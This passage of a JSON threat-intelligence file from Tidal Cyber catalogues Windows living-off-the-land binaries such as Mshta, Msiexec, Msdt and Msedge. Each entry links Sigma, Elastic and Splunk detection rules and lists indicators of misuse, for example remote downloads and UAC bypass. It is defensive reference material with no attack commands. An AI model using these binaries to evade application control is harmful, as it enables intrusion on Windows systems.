[https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)\n* IOC: Msbuild.exe should not normally be executed on workstations[[LOLBAS Msbuild](/references/de8e0741-255b-4c41-ba50-248ac5acc325)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5128", + "source": "Tidal Cyber", + "tags": [ + "dfda978e-e0a0-4e1a-85c7-d9ab2cd7ccc5", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "7e97093f-629d-4de9-8c28-3adc429e3abb", + "type": "similar" + } + ], + "uuid": "1f500e4c-25a1-4570-a3ba-5c9cd463afde", + "value": "Msbuild" + }, + { + "description": "[[Msconfig.exe - LOLBAS Project](/references/a073d2fc-d20d-4a52-944e-85ff89f04978)]", + "meta": { + "id": "1673ec41-a2e1-46eb-8c02-d71278ae5a48", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "90c6cc43-d9dd-436c-b7ee-ede979765bdf", + "type": "similar" + } + ], + "uuid": "98ecedd7-7044-41c6-b9df-5b8c88b41713", + "value": "Msconfig.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** MSConfig is a troubleshooting tool which is used to temporarily disable or re-enable software, device drivers or Windows services that run during startup process to help the user determine the cause of a problem with Windows\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\msconfig.exe\n\n**Resources:**\n* [https://twitter.com/pabraeken/status/991314564896690177](https://twitter.com/pabraeken/status/991314564896690177)\n\n**Detection:**\n* Sigma: [proc_creation_win_uac_bypass_msconfig_gui.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml)\n* Sigma: [file_event_win_uac_bypass_msconfig_gui.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/file/file_event/file_event_win_uac_bypass_msconfig_gui.yml)\n* IOC: mscfgtlc.xml changes in system32 folder[[Msconfig.exe - LOLBAS Project](/references/a073d2fc-d20d-4a52-944e-85ff89f04978)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5129", + "source": "Tidal Cyber", + "tags": [ + "7e20fe4e-6883-457d-81f9-b4010e739f89", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "98ecedd7-7044-41c6-b9df-5b8c88b41713", + "type": "similar" + } + ], + "uuid": "90c6cc43-d9dd-436c-b7ee-ede979765bdf", + "value": "Msconfig" + }, + { + "description": "[[Msdeploy.exe - LOLBAS Project](/references/e563af9a-5e49-4612-a52b-31f22f76193c)]", + "meta": { + "id": "b2d9ba67-d1e9-476a-9181-59102704fc7d", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "175b32ed-bea6-491c-8aac-d088f642a6e1", + "type": "similar" + } + ], + "uuid": "69a34cf5-5e76-48b5-b1c0-9ab895dbd9f9", + "value": "Msdeploy.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Microsoft tool used to deploy Web Applications.\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V3\\msdeploy.exe\n\n**Resources:**\n* [https://twitter.com/pabraeken/status/995837734379032576](https://twitter.com/pabraeken/status/995837734379032576)\n* [https://twitter.com/pabraeken/status/999090532839313408](https://twitter.com/pabraeken/status/999090532839313408)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_msdeploy.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_msdeploy.yml)[[Msdeploy.exe - LOLBAS Project](/references/e563af9a-5e49-4612-a52b-31f22f76193c)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5226", + "source": "Tidal Cyber", + "tags": [ + "11452158-b8d2-4a33-952a-8896f961a2f5", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "69a34cf5-5e76-48b5-b1c0-9ab895dbd9f9", + "type": "similar" + } + ], + "uuid": "175b32ed-bea6-491c-8aac-d088f642a6e1", + "value": "Msdeploy" + }, + { + "description": "[[Msdt.exe - LOLBAS Project](/references/3eb1750c-a2f2-4d68-b060-ceb32f44f5fe)]", + "meta": { + "id": "2cbee2c8-3dbd-44ed-8617-a53eeca4740a", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "bc39280c-da92-4e78-ab37-7c54ff72a1ba", + "type": "similar" + } + ], + "uuid": "19e717f8-ecab-48e6-83c0-90d8d20e875d", + "value": "Msdt.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Microsoft diagnostics tool\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\Msdt.exe\n* C:\\Windows\\SysWOW64\\Msdt.exe\n\n**Resources:**\n* [https://web.archive.org/web/20160322142537/https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/](https://web.archive.org/web/20160322142537/https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/)\n* [https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/](https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/)\n* [https://twitter.com/harr0ey/status/991338229952598016](https://twitter.com/harr0ey/status/991338229952598016)\n* [https://twitter.com/nas_bench/status/1531944240271568896](https://twitter.com/nas_bench/status/1531944240271568896)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_msdt_answer_file.yml](https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml)\n* Sigma: [proc_creation_win_msdt_arbitrary_command_execution.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msdt_arbitrary_command_execution.yml)\n* Elastic: [defense_evasion_network_connection_from_windows_binary.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml)[[Msdt.exe - LOLBAS Project](/references/3eb1750c-a2f2-4d68-b060-ceb32f44f5fe)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5130", + "source": "Tidal Cyber", + "tags": [ + "8c30b46b-3651-4ccd-9d91-34fe89bc6843", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "19e717f8-ecab-48e6-83c0-90d8d20e875d", + "type": "similar" + } + ], + "uuid": "bc39280c-da92-4e78-ab37-7c54ff72a1ba", + "value": "Msdt" + }, + { + "description": "[[Msedge.exe - LOLBAS Project](/references/6169c12e-9753-4e48-8213-aff95b0f6a95)]", + "meta": { + "id": "a9eff8ce-1b3a-4987-bcee-55ce2d140332", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "d64d75ba-1722-4a39-ab7f-d46c5d5815ec", + "type": "similar" + } + ], + "uuid": "79b9559f-79c5-4e40-85a9-6238400bb523", + "value": "Msedge.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Microsoft Edge browser\n\n**Author:** mr.d0x\n\n**Paths:**\n* c:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe\n* c:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\n\n**Resources:**\n* [https://twitter.com/mrd0x/status/1478116126005641220](https://twitter.com/mrd0x/status/1478116126005641220)\n* [https://twitter.com/mrd0x/status/1478234484881436672](https://twitter.com/mrd0x/status/1478234484881436672)\n\n**Detection:**\n* Sigma: [proc_creation_win_browsers_msedge_arbitrary_download.yml](https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_browsers_msedge_arbitrary_download.yml)\n* Sigma: [proc_creation_win_browsers_chromium_headless_file_download.yml](https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml)[[Msedge.exe - LOLBAS Project](/references/6169c12e-9753-4e48-8213-aff95b0f6a95)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5131", + "source": "Tidal Cyber", + "tags": [ + "5bd3af6b-cb96-4d96-9576-26521dd76513", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "79b9559f-79c5-4e40-85a9-6238400bb523", + "type": "similar" + } + ], + "uuid": "d64d75ba-1722-4a39-ab7f-d46c5d5815ec", + "value": "Msedge" + }, + { + "description": "[[msedge_proxy.exe - LOLBAS Project](/references/a6fd4727-e22f-4157-9a5f-1217cb876b32)]", + "meta": { + "id": "8c5556da-165d-459a-ac74-e29656433aba", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "e098413e-1d54-4d1f-bf63-1443b57bcc2f", + "type": "similar" + } + ], + "uuid": "51e2b302-2fa7-42c4-a559-6a77d987d48b", + "value": "msedge_proxy.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Microsoft Edge Browser\n\n**Author:** Mert Daş\n\n**Paths:**\n* C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge_proxy.exe\n\n**Resources:**\nNone Provided\n\n**Detection:**\nNone Provided[[msedge_proxy.exe - LOLBAS Project](/references/a6fd4727-e22f-4157-9a5f-1217cb876b32)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5182", + "source": "Tidal Cyber", + "tags": [ + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "51e2b302-2fa7-42c4-a559-6a77d987d48b", + "type": "similar" + } + ], + "uuid": "e098413e-1d54-4d1f-bf63-1443b57bcc2f", + "value": "msedge_proxy" + }, + { + "description": "[[msedgewebview2.exe - LOLBAS Project](/references/8125ece7-10d1-4e79-8ea1-724fe46a3c97)]", + "meta": { + "id": "8f151647-4a07-4e05-bb26-aee282b58d2e", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "ac6d4ab8-f34c-4b00-a943-cc2749b28a05", + "type": "similar" + } + ], + "uuid": "0a528d20-d553-4d8d-a63c-14a0bcbd442f", + "value": "msedgewebview2.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** msedgewebview2.exe is the executable file for Microsoft Edge WebView2, which is a web browser control used by applications to display web content.\n\n**Author:** Matan Bahar\n\n**Paths:**\n* C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\114.0.1823.43\\msedgewebview2.exe\n\n**Resources:**\n* [https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf](https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf)\n\n**Detection:**\n* IOC: msedgewebview2.exe spawned with any of the following: --gpu-launcher, --utility-cmd-prefix, --renderer-cmd-prefix, --browser-subprocess-path[[msedgewebview2.exe - LOLBAS Project](/references/8125ece7-10d1-4e79-8ea1-724fe46a3c97)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5183", + "source": "Tidal Cyber", + "tags": [ + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "0a528d20-d553-4d8d-a63c-14a0bcbd442f", + "type": "similar" + } + ], + "uuid": "ac6d4ab8-f34c-4b00-a943-cc2749b28a05", + "value": "msedgewebview2" + }, + { + "description": "[[LOLBAS Mshta](/references/915a4aef-800e-4c68-ad39-df67c3dbaf75)]", + "meta": { + "id": "469c9511-dc04-477d-a05b-538bb8767e7d", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "f552a5a4-49dd-4ba6-9916-e631df4d4457", + "type": "similar" + } + ], + "uuid": "061ab2c8-f37a-4a57-95b4-9cc05d00f7e2", + "value": "Mshta.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Used by Windows to execute html applications. (.hta)\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\mshta.exe\n* C:\\Windows\\SysWOW64\\mshta.exe\n\n**Resources:**\n* [https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4](https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4)\n* [https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct)\n* [https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/](https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/)\n* [https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/](https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/)\n\n**Detection:**\n* Sigma: [proc_creation_win_mshta_susp_pattern.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_susp_pattern.yml)\n* Sigma: [proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml)\n* Sigma: [proc_creation_win_mshta_lethalhta_technique.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_lethalhta_technique.yml)\n* Sigma: [proc_creation_win_mshta_javascript.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_javascript.yml)\n* Sigma: [file_event_win_net_cli_artefact.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml)\n* Sigma: [image_load_susp_script_dotnet_clr_dll_load.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml)\n* Elastic: [defense_evasion_mshta_beacon.toml](https://github.com/elastic/detection-rules/blob/f8f643041a584621e66cf8e6d534ad3db92edc29/rules/windows/defense_evasion_mshta_beacon.toml)\n* Elastic: [lateral_movement_dcom_hta.toml](https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/lateral_movement_dcom_hta.toml)\n* Elastic: [defense_evasion_suspicious_managedcode_host_process.toml](https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml)\n* Splunk: [suspicious_mshta_activity.yml](https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/stories/suspicious_mshta_activity.yml)\n* Splunk: [detect_mshta_renamed.yml](https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_renamed.yml)\n* Splunk: [suspicious_mshta_spawn.yml](https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_spawn.yml)\n* Splunk: [suspicious_mshta_child_process.yml](https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_child_process.yml)\n* Splunk: [detect_mshta_url_in_command_line.yml](https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_url_in_command_line.yml)\n* BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)\n* IOC: mshta.exe executing raw or obfuscated script within the command-line\n* IOC: General usage of HTA file\n* IOC: msthta.exe network connection to Internet/WWW resource\n* IOC: DotNet CLR libraries loaded into mshta.exe\n* IOC: DotNet CLR Usage Log - mshta.exe.log[[LOLBAS Mshta](/references/915a4aef-800e-4c68-ad39-df67c3dbaf75)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5132", + "source": "Tidal Cyber", + "tags": [ + "fe0e2dd3-962e-41a3-9850-cea146b1301f", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "31bc763e-623f-4870-9780-86e43d732594", + "type": "used-by" + }, + { + "dest-uuid": "37f317d8-02f0-43d4-8a7d-7a65ce8aadf1", + "type": "used-by" + }, + { + "dest-uuid": "c0fe9859-e8de-4ce1-bc3c-b489e914a145", + "type": "used-by" + }, + { + "dest-uuid": "dcb260d8-9d53-404f-9ff5-dbee2c6effe6", + "type": "used-by" + }, + { + "dest-uuid": "41e8b4a4-2d31-46ee-bc56-12375084d067", + "type": "used-by" + }, + { + "dest-uuid": "4348c510-50fc-4448-ab8d-c8cededd19ff", + "type": "used-by" + }, + { + "dest-uuid": "44f8bd4e-a357-4a76-b031-b7455a305ef0", + "type": "used-by" + }, + { + "dest-uuid": "4a4641b1-7686-49da-8d83-00d8013f4b47", + "type": "used-by" + }, + { + "dest-uuid": "d0f29889-7a9c-44d8-abdc-480b371f7b2b", + "type": "used-by" + }, + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "8951bff3-c444-4374-8a9e-b2115d9125b2", + "type": "used-by" + }, + { + "dest-uuid": "12279b62-289e-49ee-97cb-c780edd3d091", + "type": "used-by" + }, + { + "dest-uuid": "0bc66e95-de93-4de7-b415-4041b7191f08", + "type": "used-by" + }, + { + "dest-uuid": "646e35d2-75de-4c1d-8ad3-616d3e155c5e", + "type": "used-by" + }, + { + "dest-uuid": "061ab2c8-f37a-4a57-95b4-9cc05d00f7e2", + "type": "similar" + } + ], + "uuid": "f552a5a4-49dd-4ba6-9916-e631df4d4457", + "value": "Mshta" + }, + { + "description": "[[Mshtml.dll - LOLBAS Project](/references/1a135e0b-5a79-4a4c-bc70-fd8f3f84e1f0)]", + "meta": { + "id": "7e9c81fc-f32f-4619-8f83-03200a7d98d3", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "f94674b9-f924-4452-8516-49657ed40032", + "type": "similar" + } + ], + "uuid": "1a75f478-ea4b-4beb-a2d0-7b51e7368cb6", + "value": "Mshtml.dll" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Microsoft HTML Viewer\n\n**Author:** LOLBAS Team\n\n**Paths:**\n* c:\\windows\\system32\\mshtml.dll\n* c:\\windows\\syswow64\\mshtml.dll\n\n**Resources:**\n* [https://twitter.com/pabraeken/status/998567549670477824](https://twitter.com/pabraeken/status/998567549670477824)\n* [https://windows10dll.nirsoft.net/mshtml_dll.html](https://windows10dll.nirsoft.net/mshtml_dll.html)\n\n**Detection:**\n* Sigma: [proc_creation_win_rundll32_susp_activity.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml)[[Mshtml.dll - LOLBAS Project](/references/1a135e0b-5a79-4a4c-bc70-fd8f3f84e1f0)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5192", + "source": "Tidal Cyber", + "tags": [ + "46338353-52ee-4f8d-9f18-f1b32644dd76", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "1a75f478-ea4b-4beb-a2d0-7b51e7368cb6", + "type": "similar" + } + ], + "uuid": "f94674b9-f924-4452-8516-49657ed40032", + "value": "Mshtml" + }, + { + "description": "[[LOLBAS Msiexec](/references/996cc7ea-0729-4c51-b9c3-b201ec32e984)]", + "meta": { + "id": "6ce4d3a9-99fc-4c45-8e0e-cf6ac1e8ffdb", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "9d00d3c4-9a01-403a-9275-c94960fd871f", + "type": "similar" + } + ], + "uuid": "925dfacc-a078-4d5e-bddb-fd5e4e204b71", + "value": "Msiexec.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Used by Windows to execute msi files\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\msiexec.exe\n* C:\\Windows\\SysWOW64\\msiexec.exe\n\n**Resources:**\n* [https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/](https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/)\n* [https://twitter.com/PhilipTsukerman/status/992021361106268161](https://twitter.com/PhilipTsukerman/status/992021361106268161)\n* [https://badoption.eu/blog/2023/10/03/MSIFortune.html](https://badoption.eu/blog/2023/10/03/MSIFortune.html)\n\n**Detection:**\n* Sigma: [proc_creation_win_msiexec_web_install.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_web_install.yml)\n* Sigma: [proc_creation_win_msiexec_masquerading.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_masquerading.yml)\n* Elastic: [defense_evasion_network_connection_from_windows_binary.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml)\n* Splunk: [uninstall_app_using_msiexec.yml](https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/uninstall_app_using_msiexec.yml)\n* IOC: msiexec.exe retrieving files from Internet[[LOLBAS Msiexec](/references/996cc7ea-0729-4c51-b9c3-b201ec32e984)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5133", + "source": "Tidal Cyber", + "tags": [ + "fc2bbc6f-da5c-4afd-ae27-2fadf77c3bc4", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "a3be79a2-3d4f-4697-a8a1-83f0884220af", + "type": "used-by" + }, + { + "dest-uuid": "5e34409e-2f55-4384-b519-80747d02394c", + "type": "used-by" + }, + { + "dest-uuid": "b3220638-6682-4a4e-ab64-e7dc4202a3f1", + "type": "used-by" + }, + { + "dest-uuid": "679b7b6b-9659-4e56-9ffd-688a6fab01b6", + "type": "used-by" + }, + { + "dest-uuid": "021b3c71-6467-4e46-a413-8b726f066f2c", + "type": "used-by" + }, + { + "dest-uuid": "925dfacc-a078-4d5e-bddb-fd5e4e204b71", + "type": "similar" + } + ], + "uuid": "9d00d3c4-9a01-403a-9275-c94960fd871f", + "value": "Msiexec" + }, + { + "description": "[[MsoHtmEd.exe - LOLBAS Project](/references/c39fdefa-4c54-48a9-8357-ffe4dca2a2f4)]", + "meta": { + "id": "20fc41e3-9d53-441a-b245-95445f534531", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "d316ab94-0420-4356-a3bb-f92f42a4247c", + "type": "similar" + } + ], + "uuid": "fc985102-ca75-491e-8eac-ba8ce06670e2", + "value": "MsoHtmEd.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Microsoft Office component\n\n**Author:** Nir Chako\n\n**Paths:**\n* C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\MSOHTMED.exe\n* C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\MSOHTMED.exe\n* C:\\Program Files (x86)\\Microsoft Office\\Office16\\MSOHTMED.exe\n* C:\\Program Files\\Microsoft Office\\Office16\\MSOHTMED.exe\n* C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\MSOHTMED.exe\n* C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\MSOHTMED.exe\n* C:\\Program Files (x86)\\Microsoft Office\\Office15\\MSOHTMED.exe\n* C:\\Program Files\\Microsoft Office\\Office15\\MSOHTMED.exe\n* C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\MSOHTMED.exe\n* C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\MSOHTMED.exe\n* C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSOHTMED.exe\n* C:\\Program Files\\Microsoft Office\\Office14\\MSOHTMED.exe\n* C:\\Program Files (x86)\\Microsoft Office\\Office12\\MSOHTMED.exe\n* C:\\Program Files\\Microsoft Office\\Office12\\MSOHTMED.exe\n* C:\\Program Files\\Microsoft Office\\Office12\\MSOHTMED.exe\n\n**Resources:**\nNone Provided\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_msohtmed_download.yml](https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_msohtmed_download.yml)\n* IOC: Suspicious Office application internet/network traffic[[MsoHtmEd.exe - LOLBAS Project](/references/c39fdefa-4c54-48a9-8357-ffe4dca2a2f4)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5227", + "source": "Tidal Cyber", + "tags": [ 